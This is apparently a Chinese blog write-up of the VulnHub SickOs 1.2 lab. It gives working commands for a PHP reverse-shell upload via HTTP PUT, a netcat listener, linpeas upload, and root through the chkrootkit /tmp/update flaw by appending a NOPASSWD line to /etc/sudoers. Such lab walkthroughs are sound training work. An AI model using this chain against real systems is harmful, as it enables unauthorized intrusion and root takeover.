vulnhub SickOs: 1.2

最新推荐文章于 2024-03-21 22:23:42 发布
最新推荐文章于 2024-03-21 22:23:42 发布
阅读量2.6k 收藏 1
点赞数 2
分类专栏: vulnhub 文章标签: PUT chkrootkit 定时任务 安全 linux提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/122463492
版权

渗透思路:

nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权

环境信息:

靶机ip:192.168.101.39

攻击机ip:192.168.101.34

具体步骤:

步骤1:nmap扫描

sudo nmap -sS -A -p- 192.168.101.39

扫描到22端口(ssh)和80端口(http)

步骤2:dirb扫描网站目录

dirb http://192.168.101.39

除了网站主目录http://192.168.101.39/index.php,只扫到一个目录http://192.168.101.39/test/

访问一下网站主目录,发现就一张图,查看源代码也没什么线索

访问一下 http://192.168.101.39/test/发现是一个目录,目录是空的,另外还印证了一下nmap扫描结果,网站服务器是lighttpd 1.4.28。

步骤3:通过PUT方法上传php反弹shell

在网上找到的lighttpd 1.4.28历史漏洞没有getshell的,但我想或许可以通过目录遍历漏洞来获取什么敏感文件信息,里面或许有线索。尝试了许久,没有成功。

后来尝试访问http://192.168.101.39和http://192.168.101.39/test/的时候,burpsuite抓包,并将请求报文中的请求方法从GET换成PUT,只要这两个url中有支持PUT方法的,就可以上传shell。

http://192.168.101.39的请求报文的请求方法换成PUT之后,返回报文和GET的完全一样,尝试在url之后加文件名,比如http://192.168.101.39/shell.php,则会报404。这恐怕不行。

http://192.168.101.39/test/的请求报文中,先把请求方法换成OPTIONS(虎一点也可以省略这步),可以确定这个url是支持PUT方法的。

接下来修改请求报文,请求方法修改为PUT,url修改为 http://192.168.101.39/test/shell.php,请求头下面空一行,把kali linux上的/usr/share/webshells/php/php-reverse-shell.php的内容复制进来,改一下$ip和$port(分别改成攻击机ip和监听端口)。

发送之后再访问http://192.168.101.39/test/,发现该目录下已经有了一个文件shell.php

攻击机上用nc监听2333端口

nc -nlvp 2333

访问 http://192.168.101.39/test/shell.php 触发反弹shell,没想到居然失败啦…………

换了好几个端口号,最后发现监听443端口的时候能成功

nc -nlvp 443

访问 http://192.168.101.39/test/shell4.php 触发反弹shell

反弹shell中输入以下命令,得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

步骤4:利用chkrootkit漏洞提权

传输提权检测脚本linpeas.sh的时候遇到了问题,用步骤3中的方法,也就是通过burpsuite上传的linpeas.sh运行时报错。

而由于之前已经发现靶机连接很多外部端口是不允许的,因此用wget也不大行。

而通过curl命令上传linpeas.sh的时候,由于curl会先发送一个带Expect头的报文,而lighttpd不支持这个头,因此无法上传成功。

curl -v -X PUT -T /home/kali/linpeas.sh http://192.168.101.39/test/linpeas.sh

 最后现学了一个方法,通过nmap上传,终于上传成功了

sudo nmap -p 80 192.168.101.39 --script http-put --script-args http-put.url='/test/linpeas.sh',http-put.file='linpeas.sh'

上传成功后,在靶机的/var/www/test目录下执行以下命令,使linpeas.sh可执行。

chmod +x linpeas.sh

然后执行linpeas.sh

./linpeas.sh

linpeas.sh也没找到啥一眼看上去就有利用空间的东西……

定时任务这块,一堆绿色(正常)的中间有三个白色的,似乎有点东西

在攻击机上用searchsploit把这三个的exploit都search一遍,apt-xapian-index的没找到,lighttpd的没有本地提权相关的漏洞,chkrootkit倒是有

searchsploit chkrootkit

版本要求0.49。

靶机上查询 chkrootkit 版本,发现靶机上的chkrootkit的版本是0.49,这不是巧了

chkrootkit -V

我们用33899.txt那个exploit,找一下它在本地的存储位置

searchsploit -p 33899.txt

 

 看一下它的内容

cat /usr/share/exploitdb/exploits/linux/local/33899.txt

 有教手工利用的方法:

在/tmp文件夹下新建一个名为update的文件,并以root的身份执行chkrootkit,那么/tmp/update就会被root用户执行。

看到一种比较方便的利用方法,是在/tmp/update中写入修改/etc/sudoer文件的内容,使www-data用户可以免密码以任何用户的身份执行sudo命令。

具体命令如下,其中chmod 444 /etc/sudoers只是为了方便观察/tmp/update是否被执行(因为 /etc/sudoers原本的权限是440),提权成功后记得把权限改回来

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 444 /etc/sudoers' > /tmp/update

查看一下 /tmp/update的内容

给 /tmp/update 可执行权限

chmod +x /tmp/update

很快,/etc/sudoers的权限就变成444了

执行

sudo su

发现报错。原来sudoer的权限必须是0440啊……

那再把sudoer的权限改回来

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

很快(不到一分钟),执行 sudo su就可以获得root权限,flag在/root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt中

后记:

我有个疑惑,为啥exploit准备好之后,不到一分钟就实现提权了呢?

如果是执行的/etc/cron.daily/chkrootkit,那按照靶机的配置应该是每天早上执行一次

所以我仔细看了一下 /etc/cron.daily/chkrootkit 的内容,配合/etc/chkrootkit.conf,发现/etc/cron.daily/chkrootkit实际上根本不会被执行

 

突然想起来,提权之前/etc/cron.d是没有权限查看的,因此在root权限下又执行了一遍

ls -al /etc/cron*

确实, /etc/cron.d下面还有个chkrootkit

果然是这货在每分钟执行一次chkrootkit

 

仙女象
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 398
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
靶机渗透练习39-SickOs2
hirak0的博客
04-18 814
靶机描述 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ Description About Release Name........: SickOs1.2 Date Release: 26 Apr 2016 Author......: D4rk Series......: SickOs Objective...: Get /root/7d03aaa2bf93d80040f3f22ec6ad9d5a.txt Tester(s)...: h1tch1, E
Vulnhub | DC: 9 |【实战】
bin789456的博客
09-19 346
靶场链接:DC系列,有些知识点在DC:1中提到,可以翻阅恭喜你,DC_9是DC系列的最后一个靶场,你已经刷完DC系列了,推荐你看最后的DC篇总结。
Vulnhub靶机:SickOs1.2
最新发布
qq_48904485的博客
03-21 711
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1838
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
Vulnhub靶机SickOs1.1渗透
xingjinhao123的博客
02-26 305
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件 发布日期是2015年11月 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取靶机IP地址 扫描端口,没有发现熟悉的80端口 使用nikto简单扫一下312
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 993
记一次Vulnhub-SickOs1.2渗透过程
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
vulnhub靶场渗透之SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 1863
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
SickOs1.2靶场练习&小白详解&计划任务提权&chkrootkit提权
jockerboss的博客
03-07 1005
SickOs1.2靶场渗透详解&小白入门&计划任务提权&chkrootkit提权
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2182
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4270
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
SICKOS: 1.2
MD@@nr丫卡uer
12-18 360
#1寻找目标 nmap -sS -O 192.168.1.0/24 确定ip 192.168.1.124 #2扫描端口 nmap -sS -O -sV 192.168.1.124 发现开放80端口,从web入手。 #3寻找入口 查看源代码,没东⻄。 扫描一下目录 访问瞅瞅,注意到lighttpd/1.4.28 找找有没有能利用的,没有发现能利用的 使用nikto扫描一下,看到一些信息 nikto -host 192.168.1.124 nmap看一下http中开启的methods方法,有个pu
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3793
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
Vulnhub靶机 SickOs1.2
菜浪马废的博客
04-25 221
没啥有用的东西 只有一个test 可以用put方式 试了好几个端口4444 1180 1234都不行 换了443可以了 成功提权 就用了一种方法 这有个大佬,写的超级详细 传送门 ...
No.12-VulnHub-SickOs: 1.1-Walkthrough渗透学习
qq_34801745的博客
01-10 2916
** VulnHub-SkyTower: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/sickos-11,132/ 靶机难度:中级(CTF) 靶机发布日期:2015年12月11日 靶机描述:这个CTF明确地比喻了如何在网络上执行黑客策略,以在安全的环境中危害网络。 这个虚拟机与我在OSCP中遇到的实验室非常相似。 目的是破坏网络/计算机并...
VulnHub靶机-SickOs1.1
Slow_的博客
02-22 751
VulnHub靶机-SickOs1.1 下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.194 文章目录VulnHub靶机-SickOs1.1一、信息搜集二、Getshell三、提权 一、信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值